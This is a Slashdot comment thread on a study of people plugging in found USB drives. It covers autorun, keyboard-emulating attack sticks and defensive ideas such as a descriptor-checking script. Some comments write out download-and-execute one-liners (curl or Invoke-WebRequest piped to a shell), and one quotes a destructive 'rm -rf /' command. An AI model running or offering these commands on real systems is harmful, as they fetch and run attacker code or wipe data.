A Lot of People Carelessly Plug In Random USB Drives Into Their Computers (vice.com)
An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.
I do the same thing with my penis (Score:5, Funny)
Never know what STDs are there, but YOLO
Re:I do the same thing with my penis (Score:5, Funny)
People are stupid (Score:3, Insightful)
People are stupid, film at 11.
Can't blame "people"; it's the industry's failing (Score:3, Insightful)
This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that don't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.
In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do w
Re: (Score:3)
You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.
Re: (Score:2)
Being that a dropped USB drive is a rather expensive way to try to infect a random PC. Unless you do so in some sort of work area, where you are hoping that the guy will do this to his work PC, so you can get onto the corporate network.
But if a guy picks it up and plugs it into his PC, you are spending a lot of money for little value.
However, if you found someone's USB drive, you may be able to get valuable info from that and use it to your advantage, if you were such a bad person as to do so.
In terms of
Re:People are stupid (Score:5, Informative)
Re: People are stupid (Score:4, Insightful)
Re:People are stupid (Score:5, Interesting)
It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.
Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.
Re:People are stupid (Score:4, Insightful)
And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.
Re:People are stupid [Not] (Score:4, Insightful)
No, the people are NOT stupid.
Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.
The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.
Re: (Score:3)
No, the people are NOT stupid.
Thousands upon thousands of years of history disagree.
USB keyboard. Your computer DOES run the commands (Score:5, Informative)
You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.
Re: (Score:3)
WebRequest tinyurl.com/hfgrhd | powershell.exe (Score:3)
Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script:
Win+R Invoke-WebRequest tinyurl.com/hfgrhd | powershell.exe
And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh | sh
Ctrl-Alt+F7
Powershell or /bin/sh takes over from there - the victim could yank the trojan device out and the malicious script wi
It downloads and runs a program (Score:4, Interesting)
There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:
Win+R powershell -command 'Invoke-WebRequest http...
Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).
Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell".
The Linux/Unix/Mac version is similar:
curl http://tinyurl.com/hacker | sh
Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.
Re: (Score:3)
Re: (Score:3, Interesting)
OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"
True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.
A partial solution would be to display a message and give the user 90 seconds to respond.
"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."
Re:USB keyboard. Your computer DOES run the comman (Score:4, Interesting)
Re: (Score:3)
Basically how I did it (first for screen saver loc (Score:4, Interesting)
That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.
At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.
Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.
Re: (Score:2)
Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?
Re:People are stupid (Score:4, Insightful)
Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?
The problem isn't that you can run harmful code off a storage device; that's a known problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.
As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.
Re: (Score:3)
I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.
If your screwdriver could unscrew stuff by itself without your permission, you probably shouldn't trust it.
-
Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?
For some people, it's both.
Re: (Score:2)
Operating systems are stupid.
Re: (Score:3)
I too would plug in a random USB stick. Without knowing the situation of the device I plug it into, why would you assume that I am stupid?
Because plugging in a USB stick that you found laying around in the parking lot or other random place would be a stupid thing to do.
The chance of getting juicy selfies are a lot high (Score:3)
The chance of getting juicy selfies is a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds of not getting infected. The study did not compare this.
Re:The chance of getting juicy selfies are a lot h (Score:5, Insightful)
Re:The chance of getting juicy selfies are a lot h (Score:5, Interesting)
Yeah right.
I'm not most people, but I did exactly this (with an SD card).
I went through photos on the card, managed to find one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.
I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.
She responded and sent her uncle to come pick it up.
He did.
Re:The chance of getting juicy selfies are a lot h (Score:4, Funny)
Re: (Score:3)
I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the number of USB sticks containing malware.
Mobile phone may be different.
Is this still true? (Score:3)
Does Windows still run things automatically from external media? I thought that had been changed in Win 7.
Re:Is this still true? (Score:5, Informative)
You pretty much need to disable it yourself, which means you need to know to do it.
Microsoft still treats auto-run like it's not a terrible idea.
It's actually kind of scary that anybody would keep doing that.
As far as I can see, Windows still excitedly runs anything it sees.
Re: (Score:3, Insightful)
A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.
Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.
Re: (Score:2)
Just take a look at the USB Rubber Ducky sold by Hak5 (https://hak5.org/store). It'll emulate a keyboard and has a lot of available scripts for "penetration testing". I don't recommend going to that site from work since many businesses will treat it as a hacking site (even if the information is pertinent to your work).
Re: (Score:2)
Microsoft still treats auto-run like it's not a terrible idea.
Although Microsoft is certainly guilty of a lot of really bad design decisions, they are not alone. Almost every company that produces software seems to operate as if they've given zero consideration to security.
Re: (Score:3, Informative)
The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP
Re:Is this still true? (Score:5, Informative)
First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)
Then Windows started prompting the user before auto-run from CD drives also.
So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.
Re: (Score:3)
This seems pretty easy to deal with. First off, a USB stick acting as a keyboard probably isn't going to get too far if it's plugged into a non-Windows computer, because all those hotkeys assume a Windows OS and probably won't work in a different environment.
But aside from that, the easy way to deal with this problem is to simply ask the user if they want to use the new keyboard they plugged in as a keyboard, or something to that effect (and only accept input from previously-known input devices until this
Re:Is this still true? (Score:5, Insightful)
Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?
Re: (Score:3)
How about any unrecognized keyboard pops up with a window that says in big-bright letters, "You've just plugged in a new keyboard. Please type the following randomly-generated code into your keyboard to verify that you want to use this keyboard." It may be a bit annoying, but it only happens the first time you plug in a keyboard. In order for a malicious fake-keyboard to be recognized, the user either needs to type in the code anyway (which requires a certain level of stupidity) or the fake-keyboard need
Re: (Score:3)
And if the keyboard is a barcode scanner? Or a mini gaming keyboard with only the keys near WASD?
Re: (Score:2)
our ke breaks.
ou bu a new keboard.
ou plug it in.
Windows asks if ou want to use the new keboard.
ou can't hit to accept.
Alsoourspacebarbreaks.
Andourenterkeorarrows.Andourmousetoo.OrmabeouunpluggedanofthemandpluggedthemintoadifferentportsoWindowsthinksthe'renewdevices.
Re: (Score:2)
Right, but unlike the other stuff, this one is pretty challenging. One reasonable guess might be to use the USB keyboard if and only if there's no other USB keyboard on the device, and prompt for if you meant to attach a keyboard if there's one present. This could also be done if there's either a keyboard OR a mouse. But if both are absent, and you plug in a keyboard or an attack drive that is secretly a keyboard, how on earth could you tell?
The fact that keyboards and mice are USB is the core issue- tha
Re: (Score:2)
Hahahaha, you're funny! Running as non-administrator accounts. Windows doesn't even make this the slightest recommendation when you set up a new PC. Who cares about the 1% of PCs that will require an admin password. For 99% of them you just send the enter key after an action that will require elevated permissions.
non-admin accounts. . . you kill me :D ! What are people going to think of next?!?! Having your password secured somewhere other than that Post-it next to the screen?
Re: (Score:3)
On the bright side, I am pretty sure they haven't made USB memory sticks yet that can read and parse the post-it on the monitor!
Re: (Score:3)
It was changed in Vista actually.
Back in WinXP you could use something like iHound on your flash drives to keep track of them.
http://www.cbsnews.com/news/re...
But then Vista wouldn't do the auto-run, so AFAIK no one else has made a LoJack for flash drives.
Re: (Score:2)
Of course it still has to have the correct driver installed to open it.
Want to be extra annoyed? Plug it into a different USB port, and then it has to install the exact same driver again for the new port XD
Re: (Score:2)
Don't forget the exact same interminable wait while it checks Windows Update for the same driver.
Re: (Score:3)
Re: (Score:2)
OS designers, not the customers are stupid. (Score:5, Insightful)
1) Given: People will take a random USB stick and plug it into a computer.
2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The minimal convenience of having auto-run for USB drives is far overridden by the huge security leak.
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
Re: (Score:3)
How do you distinguish betwixt an attack keyboard versus the user plugging in a real keyboard?
Re: (Score:2, Insightful)
USB drives can be set to short circuit a motherboard.
Conclusion: Don't plug unknown USB drives into your computer.
Re: (Score:2)
Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.
And if there is a manual, it was probably delivered on a USB stick.
Re: (Score:3)
2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.
The OS is not the problem. OSes haven't auto-executed content on USB sticks for a long time. The problem is the USB subsystem itself. A stick could enumerate as any number of devices, including a keyboard and mouse and take control of the computer as the current user with absolutely zero possibility for the OS to do anything about it.
A USB device has also been shown to do actual damage to hardware without the OS even running or the computer even being turned on.
Stop trying to idiot-proof things. That never works.
Mr. Robot (Score:5, Informative)
Re: (Score:2, Informative)
Many of the attack-vectors displayed in Mr. Robot were so used because they have been successful in the real world.
Re: (Score:2)
Turn off autorun (Score:4, Interesting)
Quick question (Score:2)
I turned off autorun on any external media a long time ago, back when Sony CDs were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.
Just a quick question.
Suppose the device identifies as a USB keyboard, or identifies as a dual use device USB stick/keyboard?
Suppose the keyboard device is generic, doesn't require a driver, and the micro on the USB stick starts to type things on your computer.
Could that install malware on your system?
(Of course, I didn't need to identify keyboard devices specifically. There are a bunch of devices that a USB device can identify as, some of which allow data to be loaded onto your computer.)
Re: (Score:2)
Re: (Score:2)
don't eat candy from the ground, either (Score:3)
How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!
Re: (Score:2)
Re: (Score:3)
I've busted apart some of those Ali/Ebay/Banggood USB chargers out of sheer morbid curiosity. Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection. Even the supposed "hubs" lack capacitors, or even crystals for the controllers. Many of them even save money and omit the diode meant to prevent wall-wart supply voltage from feeding back to the host computer. They are way too busy ripping you off the old-fashioned way to take on
Is this really new? (Score:2)
I heard of dropping random USB sticks in public places (10?) years ago for testing security (IIRC in the context of testing banks). That along with strategically dropping CDs in the bathrooms of companies with the CDs marked something like "Super secret HR layoff plan".
Ell no different than (Score:2)
people picking up random hookers and plugging into them.
Penetration Testing 101 (Score:3)
People are simple like that. Every so often someone asks me what the best way to crack a (misc.) password is. I tell them to ask for it.
Automatically good? (Score:2)
Re: (Score:2)
https://it.slashdot.org/story/...
Yeah, brand new drives straight from the manufacturer.
USB authorization (Score:5, Informative)
What kind of dumb OS... (Score:4, Insightful)
What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?
Oh right, Windows. Well, there's your problem.
Re: (Score:3, Interesting)
It doesn't even have to involve autorun: https://www.blackhat.com/us-14/briefings.html#badusb-on-accessories-that-turn-evil
Once reprogrammed, benign devices can turn malicious in many ways, including:
A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
The device can a
Screw all the drives! (Score:2)
Blame the OS? Nope. I'll blame the Operator, not the Operating System.
Woah! (Score:2)
The intro says: "The problem isn't that people are idiots..."
Let's stop right there. I know for a fact that this premise is wrong.
Trust your own (Score:4, Funny)
As a Canadian, I cannot trust either China or the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.
In other news (Score:2)
Still? (Score:2)
...They say that Stuxnet got deployed like this. Awesome hack, Stuxnet....
Staff secretly dropped computer discs and USB thumb drives in the parking lots of government buildings and private contractors. Of those who picked them up, 60 percent plugged the devices into office computers, curious to see what they contained. If the drive or CD case had an official logo, 90 percent were installed....
Not only USB "Drives" (Score:2)
Commvault gave away as swag a few years ago (2011 I believe) a device that looked like a common trade show USB key. However, instead of being an actual useful USB key (it wasn't even a storage device), it behaved like a USB keyboard: upon loading, it hit WinKey-R and typed in a webpage (you could see the letters type across the screen). When I first saw those, it wasn't hard to imagine how easily those could be abused for just this scenario. Heck, you could theoretically have it do all kinds of sneaky
Windows Only? (Score:2)
In 1989, it was floppies (Score:2)
In 1989, people would plug random floppies into their computers. At least one early computer virus was spread that way. The more things change...
Re: (Score:2)
Re: (Score:2)
At least the floppies didn't auto-run. You were safe unless you actually booted the computer with the durn thing.
Old news, but somehow still relevant. (Score:2)
But how about porn? (Score:2)
Well, then fix it. (Score:2)
The problem is that the OS will automatically run a program that can install malware from a USB stick.
Mine doesn't. I know of no Linux or BSD machine that automagically runs any kind of +x'ed code on any kind of removable media.
At least not out of the box. Gee, I wonder what OS is designed for "convenience" rather than protecting the user, and their computer.
Does it start with a W?
--
BMO
The issue isn't People - it's the Autoplay (Score:2)
Do your external hard drives autoplay when you put them in? Nope!
The issue here is the bullshit autoplay. CDs and DVDs are guilty of that as well. I have no idea why it's a default feature on computers... the default should be to just open the volume like a drive to allow you to peruse the files on the medium and select what you want to open.
IMO this is a HUGE failure on the OS and whoever decided to allow Auto Play to be a thing.
What about killer USB? (Score:2)
https://motherboard.vice.com/r...
Really? (Score:2)
The problem isn't that people are idiots
Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computer's fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.
The problem is that it isn't safe to plug a USB stick into a computer.
Bullshit. It's perfectly safe to insert a USB sti
Real or mock mocking! (Score:2)
Should we also mock Bruce for saying:
"The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good."
I would say the latter is still suspect, what with Bad-USB firmware and other stuff; just because someone you trust gives you something, the trust does not extend to the something.
Sounds like a business opportunity (Score:2)
First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.
--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized fil
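An added example (mine, not any poster's code) of the first two checks in that list, and of the "dual use device USB stick/keyboard" question raised earlier in the thread: parse the device's USB configuration descriptor and accept it only if every interface it exposes is mass storage, so a composite stick-plus-keyboard or a pure HID keyboard is refused before the host ever binds a driver to it. The descriptor byte strings are constructed here for illustration; the policy function is what an intermediary "USB condom" or a host-side authorization hook would run on the real descriptor.

```python
"""Descriptor-level allow-list for removable USB devices (added example, constructed data)."""
from __future__ import annotations
from dataclasses import dataclass
import struct

# USB-IF class codes and standard descriptor types used below
CLASS_HID = 0x03
CLASS_MASS_STORAGE = 0x08
DT_CONFIGURATION = 0x02
DT_INTERFACE = 0x04
CLASS_NAMES = {0x01: "audio", 0x02: "CDC", 0x03: "HID", 0x07: "printer", 0x08: "mass storage",
               0x09: "hub", 0x0A: "CDC-data", 0xE0: "wireless", 0xFF: "vendor-specific"}


@dataclass(frozen=True)
class Interface:
    number: int
    cls: int
    subclass: int
    protocol: int


def parse_interfaces(cfg: bytes) -> list[Interface]:
    """Walk a configuration descriptor block and return the interface descriptors it contains.

    Every descriptor starts with bLength, bDescriptorType; advancing by bLength skips endpoint,
    HID and class-specific descriptors without needing to understand them.
    """
    if len(cfg) < 9 or cfg[1] != DT_CONFIGURATION:
        raise ValueError("not a configuration descriptor")
    total_len = struct.unpack_from("<H", cfg, 2)[0]  # wTotalLength
    if total_len != len(cfg):
        raise ValueError(f"wTotalLength {total_len} != {len(cfg)} bytes supplied")
    interfaces, off = [], 0
    while off < len(cfg):
        if off + 2 > len(cfg) or cfg[off] < 2 or off + cfg[off] > len(cfg):
            raise ValueError(f"malformed descriptor at offset {off}")
        length, dtype = cfg[off], cfg[off + 1]
        if dtype == DT_INTERFACE and length >= 9:
            num, _alt, _neps, cls, sub, proto = cfg[off + 2:off + 8]
            interfaces.append(Interface(num, cls, sub, proto))
        off += length
    return interfaces


def storage_only_policy(cfg: bytes) -> tuple[bool, str]:
    """Allow a device only if every interface it exposes is a mass-storage interface.

    A thing that claims to be a memory stick may expose nothing else: a composite
    stick+keyboard or a pure keyboard is refused, with the offending classes named.
    """
    ifaces = parse_interfaces(cfg)
    if not ifaces:
        return False, "no interfaces"
    bad = [i for i in ifaces if i.cls != CLASS_MASS_STORAGE]
    if not bad:
        return True, f"{len(ifaces)} mass-storage interface(s) only"
    names = ", ".join(f"#{i.number} {CLASS_NAMES.get(i.cls, hex(i.cls))}" for i in bad)
    return False, f"non-storage interface(s): {names}"


# --- constructed sample descriptors (not captured from real hardware) ---
def _cfg(*descs: bytes) -> bytes:
    body = b"".join(descs)
    n_if = sum(1 for d in descs if d[1] == DT_INTERFACE)
    return struct.pack("<BBHBBBBB", 9, DT_CONFIGURATION, 9 + len(body), n_if, 1, 0, 0x80, 50) + body


def _iface(n: int, cls: int, sub: int, proto: int, neps: int) -> bytes:
    return struct.pack("<BBBBBBBBB", 9, DT_INTERFACE, n, 0, neps, cls, sub, proto, 0)


EP_BULK_IN = struct.pack("<BBBBHB", 7, 0x05, 0x81, 0x02, 512, 0)
EP_BULK_OUT = struct.pack("<BBBBHB", 7, 0x05, 0x02, 0x02, 512, 0)
EP_INT_IN = struct.pack("<BBBBHB", 7, 0x05, 0x83, 0x03, 8, 10)
HID_DESC = bytes([9, 0x21, 0x11, 0x01, 0x00, 0x01, 0x22, 0x3F, 0x00])  # skipped by the walker
PLAIN_STICK = _cfg(_iface(0, CLASS_MASS_STORAGE, 0x06, 0x50, 2), EP_BULK_IN, EP_BULK_OUT)
STICK_PLUS_KEYBOARD = _cfg(_iface(0, CLASS_MASS_STORAGE, 0x06, 0x50, 2), EP_BULK_IN, EP_BULK_OUT,
                           _iface(1, CLASS_HID, 0x01, 0x01, 1), HID_DESC, EP_INT_IN)
KEYBOARD_ONLY = _cfg(_iface(0, CLASS_HID, 0x01, 0x01, 1), HID_DESC, EP_INT_IN)

if __name__ == "__main__":
    for name, cfg in [("plain stick", PLAIN_STICK), ("stick+keyboard", STICK_PLUS_KEYBOARD),
                      ("keyboard only", KEYBOARD_ONLY)]:
        ok, why = storage_only_policy(cfg)
        print(f"{name:15s} -> {'ALLOW' if ok else 'DENY'} ({why})")
```

On a real host the same check fits where the OS enumerates the device, before it is authorized; the descriptor walk is the part that generalizes to any composite device, not just the stick-plus-keyboard case.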
No shit sherlock? (Score:2)
I think this story runs once a year, choir having been preached to, problem continues.
Re: (Score:2)
Re:disable auto-run (Score:4, Insightful)
The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.
Re: (Score:2)
The problem is that you just plugged in a keyboard, and it will execute command keys and type stuff in to make itself able to run remote code.
Re: (Score:2)
Short story: do this in a VM.
Re: (Score:2)
sudo rm -rf / --no-preserve-root
from the fake keyboard.
Re: (Score:2)
No,
No
and
No.
Re: (Score:2)
Tried to update the RAID firmware without shutting down data usage? Forced an unclean reboot to the diagnostics?